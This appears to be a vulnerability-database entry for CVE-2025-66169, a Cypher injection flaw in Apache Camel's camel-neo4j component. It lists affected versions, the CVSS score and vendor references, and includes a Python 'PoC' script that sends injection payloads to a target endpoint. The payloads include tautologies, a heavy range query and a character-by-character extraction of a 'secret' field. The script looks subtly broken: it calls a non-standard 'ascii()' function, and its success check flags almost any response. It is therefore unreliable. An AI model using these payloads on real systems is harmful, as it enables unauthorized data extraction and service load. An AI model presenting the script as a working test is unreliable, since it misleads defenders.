CVE-2025-66169

Description

Cypher Injection vulnerability in Apache Camel camel-neo4j component. This issue affects Apache Camel: from 4.10.0 before 4.10.8, from 4.14.0 before 4.14.3, from 4.15.0 before 4.17.0 Users are recommended to upgrade to version 4.10.8 for 4.10.x LTS and 4.14.3 for 4.14.x LTS and 4.17.0.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:camel:*:*:*:*:*:*:*:* - VULNERABLE

Apache Camel 4.10.0 - 4.10.7

Apache Camel 4.14.0 - 4.14.2

Apache Camel 4.15.0 - 4.16.x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-66169 Cypher Injection PoC for Apache Camel camel-neo4j
# This PoC demonstrates a time-based blind Cypher injection

import requests
import time

TARGET_URL = "http://target-server:8080/api/neo4j/query"

def test_cypher_injection():
    """
    Test for Cypher injection vulnerability in camel-neo4j component.
    Replace 'property' with actual field names based on target application.
    """
    
    # Normal query (baseline)
    normal_payload = {"query": "MATCH (n) RETURN n"}
    start = time.time()
    response = requests.post(TARGET_URL, json=normal_payload)
    baseline_time = time.time() - start
    
    # Blind injection using time-based technique
    # This payload attempts to extract data character by character
    injection_payloads = [
        # Basic injection test
        {"query": "MATCH (n) WHERE n.property = '' OR '1'='1 RETURN n"},
        
        # Time-based blind injection (Neo4j specific)
        {"query": "MATCH (n) WHERE n.property = '' OR 1=1 WITH collect(n) as nodes UNWIND nodes as n RETURN n LIMIT 1"},
        
        # Detect vulnerable parameter by causing delay
        {"query": "MATCH (n) WHERE n.property = '' OR 1=1 WITH [x in range(1,1000000) | 'a'] as dummy RETURN dummy[0]"},
        
        # Extract data using substring and ASCII comparison
        {"query": "MATCH (n) WHERE n.property = '' OR 1=1 AND ascii(substring(n.secret,0,1)) > 64 RETURN n"}
    ]
    
    print(f"Baseline response time: {baseline_time:.2f}s")
    print("Testing injection payloads...")
    
    for i, payload in enumerate(injection_payloads):
        try:
            start = time.time()
            response = requests.post(TARGET_URL, json=payload, timeout=30)
            elapsed = time.time() - start
            
            print(f"\nPayload {i+1}:")
            print(f"  Status: {response.status_code}")
            print(f"  Response time: {elapsed:.2f}s")
            print(f"  Response length: {len(response.text)}")
            
            # Check for signs of successful injection
            if elapsed > baseline_time * 2 or response.status_code != 500:
                print("  [!] Potential injection detected")
                
        except requests.exceptions.RequestException as e:
            print(f"  [!] Request failed: {e}")

if __name__ == "__main__":
    print("CVE-2025-66169 Cypher Injection Test")
    print("=" * 50)
    test_cypher_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66169
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66169
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66169/
[4] VulDB https://vuldb.com/cve/CVE-2025-66169
[5] https://camel.apache.org/security/CVE-2025-66169.html
[6] http://www.openwall.com/lists/oss-security/2026/01/13/5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66169", "sourceIdentifier": "[email protected]", "published": "2026-01-14T12:16:32.257", "lastModified": "2026-01-16T14:29:11.873", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cypher Injection vulnerability in Apache Camel camel-neo4j component.\n\nThis issue affects Apache Camel: from 4.10.0 before 4.10.8, from 4.14.0 before 4.14.3, from 4.15.0 before 4.17.0\n\nUsers are recommended to upgrade to version 4.10.8 for 4.10.x LTS and 4.14.3 for 4.14.x LTS and 4.17.0."}, {"lang": "es", "value": "Vulnerabilidad de inyección Cypher en el componente camel-neo4j de Apache Camel.\n\nEste problema afecta a Apache Camel: desde 4.10.0 antes de 4.10.8, desde 4.14.0 antes de 4.14.3, desde 4.15.0 antes de 4.17.0\n\nSe recomienda a los usuarios actualizar a la versión 4.10.8 para 4.10.x LTS y 4.14.3 para 4.14.x LTS y 4.17.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:camel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10.0", "versionEndExcluding": "4.10.8", "matchCriteriaId": "252B916C-6BC4-4FD3-BB57-76E664671FDD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:camel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.14.0", "versionEndExcluding": "4.14.3", "matchCriteriaId": "55595542-6C59-4859-A84D-736EBCBF4D91"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:camel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15.0", "versionEndExcluding": "4.17.0", "matchCriteriaId": "2BDADC08-89B9-4F37-8213-791CEA537BB8"}]}]}], "references": [{"url": "https://camel.apache.org/security/CVE-2025-66169.html", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory", "Issue Tracking"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/13/5", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}